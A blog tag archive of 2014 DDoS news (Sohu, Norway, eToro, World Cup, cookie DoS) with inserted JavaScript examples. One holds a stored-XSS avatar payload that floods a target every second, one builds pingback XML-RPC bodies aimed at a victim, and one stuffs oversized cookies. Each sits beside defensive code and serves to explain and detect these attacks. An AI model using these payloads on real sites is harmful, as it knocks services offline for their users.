Tag Archives: dos attacks

DDoS attacks grow as first DIY kits emerge

The latest quarterly DDoS analysis from Prolexic Technologies, now part of Akamai, claims that distributed denial of service activity surged by 22 percent over the last quarter, putting levels close to those seen in Q1 of this year, when existing DDoS volume and allied records were broken. Alongside the report, Trustwave is reporting the discovery of DIY DDoS kits for sale from just US$ 200 (£118), which give buyers, apart from a high-bandwidth connection, all they need to stage a wide-scale attack.

Delving into the report reveals a 72 percent increase in the average bandwidth of attacks during the second quarter, a shift towards reflection-based attacks that abuse common internet protocols, and the arrival of server-side botnets that exploit web vulnerabilities in Windows and Linux-based systems. The analysis concludes that there have been shifts in the industry targets compared with last quarter’s DDoS activity; the difference in these numbers, says the report, may be due to the different types of malicious actors that happen to be active at any particular time. “It is clear that the majority of malicious actors preferred to use volumetric attacks in Q2 – this trend was seen across all verticals. A significant variant in attack vectors by industry was the use of very sophisticated botnets against financial and media sites,” notes the report, adding that these attacks do not seem to fit the previous patterns and motives of the DDoS criminal ecosystem.

According to Trustwave, meanwhile, its research has revealed that hackers are now selling the Neutrino Bot malware kit, which can be used to infect a large number of computers, create a botnet, and launch DDoS attacks against websites and services at will. For US$ 500 (£294), hackers will sell all comers BetaBot 1.6, which Trustwave says is a remote access Trojan that can run DDoS attacks and steal sensitive data, passwords and files from infected systems.

Karl Sigler, Trustwave’s threat intelligence manager, said he was unsurprised by the findings. “Supply and demand affects malware markets like they do any market. Even though demand is high, there is an increasing amount of malware competing with each other and this helps drive down the cost. There is also a cost-benefit issue. Criminals look at how much they can make by selling stolen data acquired using the malware. Finally, age plays a role. The longer malware is on the market, the cheaper it tends to get,” he said.

Rob Bamforth, a principal analyst with Quocirca, the business analysis and research house, said that the surge in the volume and incidence of DDoS attacks in the second quarter identified by Akamai suggests a larger number of servers being infected by cyber-criminals, coupled with the fact that many systems ‘out there’ are still running Windows XP, which Microsoft stopped supporting in April. “It also suggests there is a degree of complacency in the business sector, with many managers saying they do not want to invest extra money in IT security, as they do not see a return. Many businesses are suffering an ongoing squeeze on costs, so a failure to invest in security is understandable, even if it is not the correct approach to take,” he told SCMagazineUK.com.

Nick Mazitelli, a senior consultant with Context Information Security, said that Akamai’s analysis bears out a trend seen right across the threat landscape, from cyber-crime through to state-sponsored attacks and everything in between: the widespread dissemination of increasingly capable attacker toolsets. “On the one hand this trend is fuelled by the on-going professionalisation and commoditisation of criminal marketplaces, and on the other by increasing levels of interconnection between threat groups of all stripes. Not only does this mean that existing threat groups have access to improved capability, but it also lowers the barrier of entry for newcomers thereby increasing the number of malicious parties active in the landscape – both factors that unavoidably increase the tempo of what is effectively an arms race between attacker and defender,” he said. “With this increased tempo as background it is important to highlight the necessity of a flexible and adaptable approach to security based on a sound understanding of the threat landscape. In particular those aspects of security concerned with network security monitoring as well as incident response are areas that have often been overlooked in the past, but are critical components of effectively managing the risk and minimising the potential impact of these constantly evolving threats,” he added. Source: http://www.scmagazineuk.com/ddos-attacks-grow-as-first-diy-kits-emerge/article/362573/


“Chinese YouTube” Used as DDoS attack Machine

Even the biggest websites in the world are vulnerable to DDoS. Want proof? All through this past April, a hacker took advantage of a hole in Sohu.com’s security to launch persistent cross-site scripting (XSS) attacks against various targets across the globe. Sohu.com, in case you don’t know, is one of the largest websites in the world – in fact the 24th largest, according to the Alexa Top 100 ranking. But for all its size and multi-billion dollar net worth, Sohu could be exploited by a hacker who managed to convert its popularity into a massive persistent-XSS-enabled DDoS attack.

Devastating New DDoS Attack Method

At its basis, persistent (stored) XSS is a crafty type of malicious code injection: the attacker convinces the server to store attacker-supplied content, and the server then serves that content to every browser that later loads the page. In this attack, the hacker got Sohu’s server to store a JS script that runs a DDoS tool. To do this, he placed the malicious script within the avatar image of a fabricated user profile. As with most video sites, this infected user picture would then show up next to any comment written by that profile on Sohu’s video pages. The script hijacked every new browser that loaded a video page carrying the infected comment and made it fire requests at the target site: the hacker programmed it to send a GET request to the target once a second. Imagine thousands of users watching a video on Sohu, each sending a bogus GET request every second; these requests add up quickly, to hundreds of thousands or millions every minute. Interestingly enough, the hacker also had the brains to put his infected comment on the most popular and longest-playing videos, so the viewers would rack up DDoS requests even faster. This large security event goes to show that even powerful websites can be manipulated by hackers.

Where Will the Next Attack Come From?

It’s difficult to say. This case study shows that hackers will use whatever means necessary to take down their targets. Without third-party protection services, most websites can only defend against what they have seen already; they can only react after they have been hit. In this instance, the hacker was clever enough to fly under the radar and avoid detection by Sohu’s watchful IT team. If the hacker had chosen a target without a DDoS protection service, Sohu might still be a giant DDoS machine causing havoc on innocent websites. Source: http://www.economicvoice.com/chinese-youtube-used-as-ddos-machine/
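The mechanism described above, shown as an added example that is not Sohu's code and not from the original article: a comment renderer that drops a user-controlled avatar value straight into an `img` attribute (stored XSS), beside a hardened renderer that escapes every value for its HTML context and only accepts an avatar that parses as an http(s) URL. The function names, the sample profile and the placeholder target URL in the payload are all assumptions made for the example.

```javascript
// Added example: rendering a user comment with its avatar, in the two forms
// the Sohu incident contrasts. renderCommentUnsafe, renderComment,
// safeAvatarUrl and the sample profile are hypothetical names; nothing here
// is Sohu's code. Run with: node this_file.js

// Vulnerable renderer: the avatar value is interpolated verbatim into an
// attribute, so an attacker-controlled profile field becomes stored XSS that
// every viewer of the comment executes.
function renderCommentUnsafe(profile, text) {
  return '<div class="comment">' +
    '<img class="avatar" src="' + profile.avatar + '">' +
    '<span class="author">' + profile.name + '</span>' +
    '<p>' + text + '</p></div>';
}

// What the attacker stores in the avatar field: close the src attribute and
// add an onerror handler that fires one request at the target every second.
// The target URL is a constructed placeholder.
const ATTACKER_AVATAR =
  'x" onerror="setInterval(function(){' +
  'new Image().src=\'http://victim.example/?\'+Math.random()},1000)';

// Hardened renderer: escape for the HTML attribute/text context ...
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  })[c]);
}

// ... and only let the avatar through if it is a real http(s) URL, so a
// value that is not a URL (or a javascript: URL) falls back to a default.
function safeAvatarUrl(value) {
  let u;
  try { u = new URL(String(value)); } catch { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return u.href;
}

function renderComment(profile, text) {
  const avatar = safeAvatarUrl(profile.avatar) || '/static/default-avatar.png';
  return '<div class="comment">' +
    '<img class="avatar" src="' + escapeHtml(avatar) + '">' +
    '<span class="author">' + escapeHtml(profile.name) + '</span>' +
    '<p>' + escapeHtml(text) + '</p></div>';
}

// True if the rendered HTML carries an inline event handler attribute,
// i.e. the stored payload survived into the page viewers load.
function containsEventHandler(html) {
  return /\son[a-z]+\s*=/i.test(html);
}

// Constructed attacker profile and the two renderings of its comment.
const attackerProfile = { name: 'fan2014', avatar: ATTACKER_AVATAR };
const unsafeHtml = renderCommentUnsafe(attackerProfile, 'great video');
const safeHtml = renderComment(attackerProfile, 'great video');

console.log('unsafe renderer executes payload:', containsEventHandler(unsafeHtml)); // true
console.log('hardened renderer executes payload:', containsEventHandler(safeHtml)); // false
```

The hardened version does two independent things, and both are needed: attribute escaping stops the `"` from closing the `src` value, and URL validation stops a `javascript:` scheme from surviving the escape (escaping alone would pass it through untouched).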


17-Year-Old Behind Norway DDoS Attacks This Week

On Thursday, Norwegian police arrested and charged a 17-year-old in connection with the recent massive distributed denial-of-service (DDoS) attacks directed at major financial institutions and other businesses in the country. The teen, from the city of Bergen on Norway’s west coast, claimed to be part of the hacktivist group Anonymous Norway, which, in a Twitter message, dismissed any connection to him or to the DDoS incidents. On the day of the attack, the teenager sent a letter to the media claiming to be part of Anonymous and saying that “the motivation behind the current attacks and the next attacks in the future is to get the community to wake up. The number of major IT security attacks is increasing and there is nothing being done to prevent such events.” Evidence that Anonymous Norway was not involved is the fact that the boy joined the group’s Facebook page on the day of the attack. Furthermore, the hacker outfit provided, in a new tweet, a Pastebin link pointing to the identity of the perpetrator; it did not create the post, just scooped it up. Initially, the youngster was charged with gross vandalism, which carries a maximum prison sentence of six years in Norway; since he has no record and is still a minor, this should be greatly reduced. According to News in English, Frode Karlsen of the Bergen police told Norwegian Broadcasting that the authorities are taking the matter seriously because this sort of attack can have significant impacts on society, such as individuals being unable to reach emergency services when they need help. After his arrest, the teen cooperated with the investigation and clarified the nature of his actions. His defence lawyer stated that “he’s sorry for having caused all this and has laid his cards on the table.”

The DDoS attack, which occurred on Tuesday, was considered among the largest ever seen in Norway and leveraged WordPress’s “pingback” feature. A pingback is an XML-RPC call that a WordPress blog accepts from anyone; the blog then fetches the URL named as the source of the link in order to verify it, so an attacker who names the victim as the source turns every pingback-enabled WordPress site into a reflector sending GET requests at the victim. The attack’s significance is increased by the fact that it targeted layers three (network) and four (transport) of the OSI model as well as layer seven (application) at the same time. Mitigating an application-layer DDoS attack is harder, because the requests are directed at the application interface and mimic legitimate behaviour, which makes filtering out the bad traffic more difficult. The attack aimed at disrupting the online services of major financial institutions in Norway (Norges Bank, Sparebank 1, Storebrand, Gjensidige, Nordea, Danske Bank), as well as other businesses such as Scandinavian Airlines (SAS) and Norwegian Air. The website of Telenor, the largest telecommunications company in Norway, was also affected. Source: http://news.softpedia.com/news/17-Year-Old-Behind-Norway-DDoS-Attacks-this-Week-450391.shtml
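Both ends of the pingback reflection described above, as an added example that is not from the article and not WordPress’s own code: the XML-RPC body an attacker sends to a reflecting blog, and a detector the victim can run over its own access log. The detector relies on the User-Agent string WordPress sends on its verification fetch, of the form `WordPress/<version>; <blog URL>; verifying pingback from <ip>`, where `<ip>` is the address that sent the pingback to the blog. All hosts, IPs and log lines below are constructed; function names are assumptions.

```javascript
// Added example, not from the Softpedia article: how a WordPress pingback is
// turned into a reflected GET flood, and how the victim can spot it in its
// own access log. Hosts, IPs and log lines are constructed.

// 1. The attacker's side. A pingback is an XML-RPC call; the blog receiving
//    it fetches sourceURI to verify that the page links to targetURI. Point
//    sourceURI at the victim and every blog this is sent to becomes a
//    reflector.
function pingbackRequestBody(sourceURI, targetURI) {
  const esc = s => String(s).replace(/[<>&]/g,
    c => ({ '<': '&lt;', '>': '&gt;', '&': '&amp;' })[c]);
  return '<?xml version="1.0"?>' +
    '<methodCall><methodName>pingback.ping</methodName><params>' +
    '<param><value><string>' + esc(sourceURI) + '</string></value></param>' +
    '<param><value><string>' + esc(targetURI) + '</string></value></param>' +
    '</params></methodCall>';
}

// 2. The victim's side. The verification fetch carries a User-Agent of the
//    form "WordPress/<version>; <blog URL>; verifying pingback from <ip>",
//    so each log line names both the reflector and the address that drove it.
const COMBINED_LOG =
  /^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;
const PINGBACK_UA = /^WordPress\/(\S+); (\S+); verifying pingback from (\S+)$/;

// Parses Apache/nginx combined-format lines and tallies pingback traffic.
function analyzePingbackFlood(logText) {
  const reflectors = new Map();   // blog URL -> request count
  const originators = new Map();  // IP that sent the pingbacks -> count
  let total = 0, pingback = 0;
  for (const line of logText.split('\n')) {
    if (!line.trim()) continue;
    const m = COMBINED_LOG.exec(line);
    if (!m) continue;             // skip lines not in combined format
    total++;
    const ua = PINGBACK_UA.exec(m[7]);
    if (!ua) continue;
    pingback++;
    reflectors.set(ua[2], (reflectors.get(ua[2]) || 0) + 1);
    originators.set(ua[3], (originators.get(ua[3]) || 0) + 1);
  }
  return { total, pingback, reflectors, originators };
}

// Constructed sample: three reflecting blogs, all driven from one address,
// mixed with an ordinary browser request. The random query strings are what
// make each reflected GET miss any cache in front of the victim.
const SAMPLE_LOG = [
  '203.0.113.10 - - [08/Jul/2014:10:15:01 +0000] "GET /?4711 HTTP/1.0" 200 512 "-" "WordPress/3.9.1; http://blog-a.example; verifying pingback from 198.51.100.7"',
  '203.0.113.11 - - [08/Jul/2014:10:15:01 +0000] "GET /?4712 HTTP/1.0" 200 512 "-" "WordPress/3.8.3; http://blog-b.example; verifying pingback from 198.51.100.7"',
  '192.0.2.44 - - [08/Jul/2014:10:15:02 +0000] "GET /index.html HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/30.0"',
  '203.0.113.10 - - [08/Jul/2014:10:15:02 +0000] "GET /?4713 HTTP/1.0" 200 512 "-" "WordPress/3.9.1; http://blog-a.example; verifying pingback from 198.51.100.7"',
  '203.0.113.12 - - [08/Jul/2014:10:15:02 +0000] "GET /?4714 HTTP/1.0" 200 512 "-" "WordPress/3.9.1; http://blog-c.example; verifying pingback from 198.51.100.7"',
].join('\n');

const report = analyzePingbackFlood(SAMPLE_LOG);
console.log(`${report.pingback} of ${report.total} requests are pingback verifications`);
console.log('reflectors:', [...report.reflectors]);
console.log('originators:', [...report.originators]);
```

Two things the tally gives a responder that a raw request count does not: the reflector list is what you send abuse reports to (or rate-limit by User-Agent at the edge), and the originator column is the address the blogs saw the pingbacks come from, which a UDP reflection attack would never leak.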


eToro’s Website down Due to Malicious DDOS Attacks, Functionality Restored

Thursday turned out to be a busier day than usual for social trading platform eToro. According to a company statement, the company’s service has been under attack by a malicious group of attackers since 07:12 GMT. After numerous complaints by customers of the firm, a thorough statement was provided by eToro’s CEO, Yoni Assia. “I am sure that by now, most of you are already aware of the fact that our platform was under attack by a malicious group of hackers. I realize that many of you may be frustrated, angry, or simply worried following the unusual service interruptions that happened on Thursday, July 3rd and I wanted to contact you personally to apologize and explain what happened. Since 07:12 GMT, July 3rd, eToro has been the target of a criminal DDoS attack – a technique used by hackers to take an internet service offline by overloading its servers. (To read more about DDoS attacks: http://en.wikipedia.org/wiki/Denial-of-service_attack). I believe the choice to attack today was not a random one, as both you and eToro have been gearing up for today for the better part of the week. We had everything in place for you to experience a great day of trading, with the NFP announcement. I speak for everyone at eToro when I say that we deeply regret that this experience was denied you. We have robust systems in place to deal with such instances; however the scale of this particular attack caused our platform to experience significant downtime. All your personal data, including billing information, financial information and personal details, is secure. More than that, throughout today we offered several alternatives for those of you who wanted to close a position, in order to give you as much control as was possible with regard to your portfolio. The status right now is that we were successful in restoring all of our services. Regrettably, as with attacks such as this, we might see more interruptions in the next few days. It is my personal goal to make sure you receive the best experience possible and I guarantee that all of us here at eToro are working around the clock to make sure this is exactly what you get. Our technical and service teams are at your disposal and are working non-stop to help each and every one of you resolve any issue affecting your personal account.”

Update: On Friday morning in Europe, users reported trouble with website and app functionality, and issues with logging in. Around 9 BST, the company updated the status of the website, stating that it is currently up and running, despite still being under attack. According to a company spokesperson, the malicious attempts are now blocked before they can affect eToro’s community. Source: http://forexmagnates.com/etoros-website-down-due-to-malicious-ddos-attacks-restored-only-to-go-dark-again/


Could Cookies Be Used to Launch DoS Attacks?

Giant cookies could be used to create a denial of service (DoS) on blog networks, says infosec researcher Bogdan Calin. Such an attack works by feeding users cookies with header values so large that they trigger web server errors. Calin created a proof-of-concept attack against Google’s Blogspot network after a customer reported problems during internal security testing. In his subsequent tests, he found that if one sends many cookies to a browser, sets them to never expire and scopes them to a blog network’s root domain, the user won’t ever be able to see any blogs on the service. Victims can tell if supersized cookies have been stuffed down their browser’s throat when 400 errors such as “Your browser sent a request that this server could not understand. Size of a request header field exceeds server limit” appear. Sydney security researcher Wade Alcorn (@WadeAlcorn) said the attack would work wherever custom cookies can be set. “This attack, denial-of-service by cookies, sets many long cookies, forcing the browser to create a very long request [that] is too long for the server to handle, and simply returns an error page,” Alcorn said. “The vulnerable browser won’t be able to visit that origin until the cookies are cleared. When a browser visits one of these [user-controlled] subdomains it will allow a cookie to be set on the parent domain [which] means that when a denial-of-service by cookies attack is launched, the victim browser will not be able to visit the parent domain or any of the subdomains.” For an application to be vulnerable it must give the attacker an opportunity to set custom cookies in the victim’s browser, Alcorn pointed out. Chrome users were not affected when perusing Blogspot but were on other, unnamed domains. Alcorn said a Google security rep told him the risk was a problem for web browser developers to fix, rather than for individual web app providers, and welcomed ideas that could squash the vector.
Source: http://www.theregister.co.uk/2014/07/02/monster_cookies_can_nom_nom_nom_all_the_blogs/
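The two facts that make this work, cookie scoping to a parent domain and the server’s request-header limit, are easy to see in a small model. The following is an added example, not Calin’s or Alcorn’s proof of concept and not Google’s code: a toy cookie jar that applies RFC 6265 domain matching, a check against Apache’s default 8190-byte `LimitRequestFieldSize`, and the browser-side defence the Google rep was alluding to, refusing `Domain=` values that are a public suffix (shared blog-hosting domains are on the public suffix list). The domains, the 4000-byte cookie size and all helper names are assumptions.

```javascript
// Added example, not from the Register article or the researchers' PoC: a
// minimal model of the cookie scoping and header-size limit behind
// denial-of-service by cookies. Domains, cookie sizes and helper names are
// assumptions; 8190 bytes is Apache's default LimitRequestFieldSize.
const APACHE_DEFAULT_FIELD_LIMIT = 8190;

// RFC 6265 domain matching: a cookie with Domain=blog.example is sent to
// blog.example itself and to every host under it.
function domainMatches(host, cookieDomain) {
  host = host.toLowerCase();
  cookieDomain = cookieDomain.toLowerCase();
  return host === cookieDomain || host.endsWith('.' + cookieDomain);
}

class CookieJar {
  // publicSuffixes models the browser-side defence: a Set of domains that a
  // cookie may never be scoped to, as the public suffix list provides.
  constructor(publicSuffixes = new Set()) {
    this.cookies = [];
    this.publicSuffixes = publicSuffixes;
  }

  // Simulates a Set-Cookie header received while loading `fromHost`. A page
  // on attacker.blog.example may set Domain=blog.example because fromHost
  // domain-matches it; it may not set Domain=other.example.
  setCookie(fromHost, name, value, domain) {
    if (!domainMatches(fromHost, domain)) return false;
    if (this.publicSuffixes.has(domain.toLowerCase())) return false;
    const cookie = { name, value, domain: domain.toLowerCase() };
    const idx = this.cookies.findIndex(c => c.name === name && c.domain === cookie.domain);
    if (idx >= 0) this.cookies[idx] = cookie; else this.cookies.push(cookie);
    return true;
  }

  // The Cookie request header the browser would send to `host`.
  cookieHeaderFor(host) {
    return this.cookies
      .filter(c => domainMatches(host, c.domain))
      .map(c => `${c.name}=${c.value}`)
      .join('; ');
  }

  // The victim's only recovery: drop every cookie scoped under `domain`.
  clearFor(domain) {
    this.cookies = this.cookies.filter(c => !domainMatches(c.domain, domain));
  }
}

// Would the server answer 400 ("request header field exceeds server limit")
// instead of serving the page?
function requestRejected(jar, host, limit = APACHE_DEFAULT_FIELD_LIMIT) {
  const header = 'Cookie: ' + jar.cookieHeaderFor(host);
  return header.length > limit;
}

// Attacker's step: from a blog under the shared domain, plant `count`
// never-expiring cookies of `size` bytes each, all scoped to the parent.
function stuffCookies(jar, attackerHost, parentDomain, count, size) {
  for (let i = 0; i < count; i++) {
    jar.setCookie(attackerHost, 'x' + i, 'A'.repeat(size), parentDomain);
  }
  return jar;
}

// Constructed scenario: three cookies of 4000 bytes (browsers allow roughly
// 4 KB per cookie) push the header past 8190 bytes for the parent domain and
// for every sibling blog under it, but not for an unrelated site.
const jar = stuffCookies(new CookieJar(), 'attacker.blog.example', 'blog.example', 3, 4000);
console.log(requestRejected(jar, 'blog.example'));          // true
console.log(requestRejected(jar, 'victim.blog.example'));   // true
console.log(requestRejected(jar, 'unrelated.example'));     // false

// With blog.example treated as a public suffix the Set-Cookie is refused and
// the attack never gets off the ground.
const pslJar = stuffCookies(new CookieJar(new Set(['blog.example'])),
  'attacker.blog.example', 'blog.example', 3, 4000);
console.log(requestRejected(pslJar, 'blog.example'));       // false
```

The model also shows why the fix belongs in the browser rather than in any one blog: the reflecting blog never sees the oversized request, and the parent-domain server that does see it cannot tell a stuffed jar from a legitimately large one; only the browser knows which origin set the cookies and whether that origin was entitled to the parent scope.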


Ancestry.com working to fully restore services following DDoS attack

The genealogy website Ancestry.com is working to fully restore its service after it was hit by a Distributed Denial of Service attack. Company spokeswoman Heather Erickson says it means ancestry.com was overwhelmed with bogus traffic Monday. “The attack was overloading our systems with massive amounts of traffic, but it did not access any data in servers,” Erickson said. The site, which has more than 2 million subscribers, was down for much of Tuesday and wasn’t fully operational Wednesday afternoon. Its Web team neutralized the DDoS attack and was working to fully restore services. “This has been a very frustrating and overwhelming experience, and our teams have been fantastic, working around the clock to make it neutralized,” Erickson said. Company officials are hoping to fully recover from the attack soon. Ancestry.com is posting updates on its Facebook and Twitter pages. Erickson said she doesn’t know where the attack came from. “These types of attacks aren’t unique to Ancestry. We know of many other companies that have been victim to these types of attacks. It’s unfortunate that any company has to go through something like this,” she said. The attack also impacted Ancestry.com’s sister site Find a Grave, though as of Wednesday afternoon it was back up, according to its Facebook page. Company officials said the sync and search feature in Family Tree Maker were still disabled until the site stability had been fully restored. They recommended people use the feature offline. Source: http://www.deseretnews.com/article/865605393/Ancestrycom-working-to-fully-restore-services-following-DDoS-attack.html


World Cup websites struck down by DDoS attacks

Various websites associated with the World Cup have been struck by a distributed denial of service (DDoS) attack ahead of the tournament’s opening match on Thursday. The official government World Cup website has been down for more than a day, as have the websites of some host states. Hacking collective Anonymous has claimed responsibility for the attacks. The group has published a list of over 60 websites that it has successfully taken down and that are still offline at the time of writing, including the Brazilian website of recording giant Universal Music. Public figures perceived by the hackers as supportive of the government and the World Cup are also being targeted. Performers such as Caetano Veloso, Mariana Aydar and Filipe Catto have had the content of their websites replaced by anti-FIFA messages or taken down. Last month, the internal communications system of the Brazilian Ministry of External Relations was also hacked, with a possible leak of confidential information. Even though Anonymous has not claimed direct responsibility for that attack, it has released a YouTube video justifying it and citing general dissatisfaction with the World Cup. Back in February, the hackers said they were preparing a string of cyberattacks against FIFA and sponsor websites during the World Cup, including DDoS attacks as well as website defacement and data theft. The Anonymous group has vowed to continue the attacks and is posting regular updates on Twitter under the hashtags #OpHackingCup and #OpWorldCup. Source: http://www.zdnet.com/world-cup-websites-struck-down-by-ddos-attacks-7000030479/#ftag=RSSbaffb68


Facing a criminal DDoS attack

Distributed denial of service (DDoS) attacks attempt to flood a server with so many requests that they render a website useless. The effects are many, from lost customer conversions and revenue to punished SEO ranking and blacklisting. The reality is that DDoS attack methods and the criminals behind them are evolving. Understanding this evolution is key to making sure companies that place any sort of importance on their websites stay protected. The type and style of attack is changing: there are headless browsers and application-layer attacks, and DDoS attacks used as cover for more sinister cyberattacks. Every reseller with security in the portfolio needs to understand that DDoS is not a static problem that can be dealt with and then ignored. It changes, and the tactics for defending against this type of attack need to advance even faster.

Better general awareness about DDoS attacks has forced attackers to develop new ways to get around the basic defences. Media attention on high-profile DDoS attacks attracts activists with a message, and groups try to outdo one another in a bid for attention. A growing variety of coding practices, web platforms and web design features has multiplied the number of variables which can result in application exploits that render a website useless. With more access to high-CPU devices through the cloud and dedicated hosting, DDoS attackers can now use those CPUs to run more sophisticated attacks. For these reasons, we are seeing more sophistication in attack style: less volume, with attackers doing their homework to target very specific vulnerabilities at a website’s weakest points.

One of the stealthiest methods is headless browsers. These can be a clever way for cybercriminals to get around standard DDoS protection and masquerade as legitimate web traffic. Headless browser kits are built for programmers to test their websites, so to all intents and purposes they are legitimate browser engines, just modified to run a series of queries against basic web user interfaces. Detection is difficult, and stopping a headless browser DDoS attack can take a trained professional to spot and remediate it. Importantly, because they were designed for testing, headless browsers can process JavaScript and CAPTCHA challenges and so jump through the hoops a website puts in front of bots. This will be a big problem for more traditional DDoS protection, such as appliance-based solutions. What will be most effective here is real-time support, where a human is involved who can develop rule sets to determine what is going on and implement the mitigations within seconds.

Application-layer attacks are also becoming more prevalent, although you might not even notice them if you don’t know what you are looking for. Attackers are getting better at reconnaissance and research, facilitating smarter attacks that keep the volume low and under the radar while killing the site in the background and fooling IT into spending time on the wrong part of the site when it is down. It is these application attacks and headless browser attacks that we see as the biggest concern for the future. I can only surmise that media hype is fuelling the focus on volumetric DDoS attacks, which is where the industry seems to be concentrating to meet customer expectations. In fact there is a rise in application attacks, and we should be educating companies about these threats, as they carry serious consequences for businesses that place any sort of importance on their websites.

Jag Bains is chief technology officer of DOSarrest. Source: http://www.channelweb.co.uk/crn-uk/opinion/2348218/facing-a-criminal-denial-of-service


Hacktivist Warns World Cup Sponsors Anonymous DDoS Attack is Coming

Che Commodore claims the group has already tested which sites are the most vulnerable.

A hacktivist claiming to be affiliated with the infamous online collective Anonymous has said the group is planning to DDoS various high-profile sponsors of the forthcoming FIFA World Cup this month. The hacker, who goes under the name “Che Commodore”, told Reuters in a Skype interview from Brazil that Anonymous had already begun planning the campaign, designed to protest the vast sums of money being thrown at the event while the country still suffers severe social inequality. “We have already conducted late-night tests to see which of the sites are more vulnerable,” he said. “We have a plan of attack.” The targeted firms on the Anonymous shortlist apparently include Budweiser, Adidas, Emirates and Coca-Cola, all major sponsors of the tournament, the biggest single-event sporting competition in the world. If it goes ahead, the DDoS campaign will be the second major attack by Anonymous in the region in recent days. Another hacktivist, known as AnonManifest, used a phishing attack to penetrate the Foreign Ministry’s network last week and exfiltrate over 300 confidential documents which were later posted online, the report claimed. The ministry’s email system was apparently taken down as a result and 3,000 account holders were told to change their passwords. Civil unrest directed mainly at the Brazilian government has marred the build-up to a World Cup which has already cost £9 billion, money that protesters say would be better spent on improving things like social welfare and public services. In June 2013, over one million people took to the streets of more than 100 cities in violent protests against the spiralling costs of the tournament.

David Howorth, VP at Alert Logic, said that the threat of attack during a major tournament like the World Cup is heightened by the global exposure it gives hacktivists. He urged high-profile sponsors to work with their network vendors to plan a DDoS prevention strategy; to ensure all apps are up to date and patched; and to check that firewalls, IDS and web application firewalls are configured correctly. “Make sure you have expertise that can monitor, correlate and analyse the security threats to your network and applications across your on-premise and cloud infrastructure 24×7 for continuous protection – this should be done now as the hackers are already testing the vulnerabilities in the infrastructure in preparation for their attacks,” he added. “Finally, remember that hackers are creative – don’t just focus on one attack vector as the attacker will try multiple ways to cause damage.” Source: http://www.infosecurity-magazine.com/view/38657/hacktivist-warns-world-cup-sponsors-anonymous-ddos-attack-is-coming/


WildStar early access period derailed by DDoS attacks

WildStar was set to launch for early buyers an hour ago, giving those folks a chance to jump into the game’s world days before everyone else. Unfortunately for those players (including our own Giant Robots In Disguise guild), WildStar is experiencing server issues and the developers are pointing the finger at a DDoS attack. WildStar executive producer Jeremy Gaffney posted on Reddit, “I’ve heard from a few folks it’s a confirmed DDOS attack (real time updates, may change, fog of war, etc.). Partially handled. Servers taking in some players now, player counts rising. Ninjitsu continues.” The best suggestion for now is to keep hammering away. The early bird period lasts all the way up to WildStar’s official release on June 3. Source: http://www.shacknews.com/article/84738/wildstar-early-access-period-derailed-by-ddos-attacks
